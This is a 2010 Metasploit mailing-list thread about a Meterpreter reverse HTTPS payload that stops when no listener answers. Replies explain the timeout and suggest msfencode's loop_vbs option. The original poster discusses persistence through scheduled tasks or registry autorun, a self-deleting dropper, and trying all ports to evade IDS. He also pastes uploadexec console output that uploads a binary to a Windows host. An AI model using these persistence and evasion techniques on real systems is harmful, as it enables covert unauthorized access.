Re: Meterpreter unexpectedly closes

[Miguel Rios <miguelrios35 () yahoo com>]

Thanks Carlos.
Here's the output: running against a win 7 7600 build (english) machine.

meterpreter > run uploadexec -e /root/notepad.exe
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter > run uploadexec -e /root/notepad.exe -o /Q
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter > run uploadexec -e /root/notepad.exe -v
[*] Running Upload and Execute Meterpreter script....
[*]     Uploading /root/notepad.exe....
[*]     /root/notepad.exe uploaded!
[*]     Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
[-] Error in script: ArgumentError wrong number of arguments (4 for 1)
meterpreter >           

--- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

From: Carlos Perez <carlos_perez () darkoperator com>
Subject: Re: [framework] Meterpreter unexpectedly closes
To: "Miguel Rios" <miguelrios35 () yahoo com>
Cc: "Alex Polychronopoulos" <tweakier () gmail com>, framework () spool metasploit com
Date: Saturday, July 10, 2010, 12:49 PM

Miguel 
Do send me the output of what your getting and the command it self and I will take a look
Cheers,Carlos
On Jul 10, 2010, at 8:34 AM, Miguel Rios wroteThanks. That explains it perfectly. For some reason I thought that 
meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS but 
the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously 
won't be there to respawn meterpreter. A bit of a catch 22. 

Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use the 'at' and 
'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set up on the 
internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out there on 
setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on the server?).

Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited process 
dying since it's a standalone meterpreter binary I'm playing with.

Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with 
reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks.

P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to 
%temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or something like 
that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to 
be silently executed but I must be missing something stupidly obvious. Time to sleep maybe.

--- On Sat, 7/10/10, Alex Polychronopoulos <tweakier () gmail com>
 wrote:

From: Alex Polychronopoulos <tweakier () gmail com>
Subject: Re: [framework] Meterpreter unexpectedly closes
To: "Miguel Rios" <miguelrios35 () yahoo com>
Cc: framework () spool metasploit com
Date: Saturday, July 10, 2010, 8:28 AM

Meterpreter is designed to not persistently trying to connect back to the handler, it tries once and then dies, so 
you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the 
payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file).


On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35 () yahoo com> wrote:

Hi list,
I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine 
when I test it in my XP SP3.
I see the outbound connection and the process running, but after about
a minute or so the process dies if there's no listener configured on
the receiving end and doesn't respawn.
What am I doing wrong here? I
must be missing something obvious. Is there a timeout option for this
reverse shell or a way to keep the process always running, even if it
can't connect to the listener? Or is this due to msfencoding the
payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it, it's just the 
fact it timesout so quickly that is a pain.

Also, saw the reverse_tcp allports payload and
was wondering if there's a similar one for reverse meterpreter https.
Ideally one could configure default ports to try 1st and then keep
trying randomly the other 65000 or so to evade IDS. I know this would
increase the payload size but it would be pretty stealth egress wise.

Thanks. I do really love metasploit and the whole community behind it. You all rock.

Miguel



      
_______________________________________________

https://mail.metasploit.com/mailman/listinfo/framework













      _______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework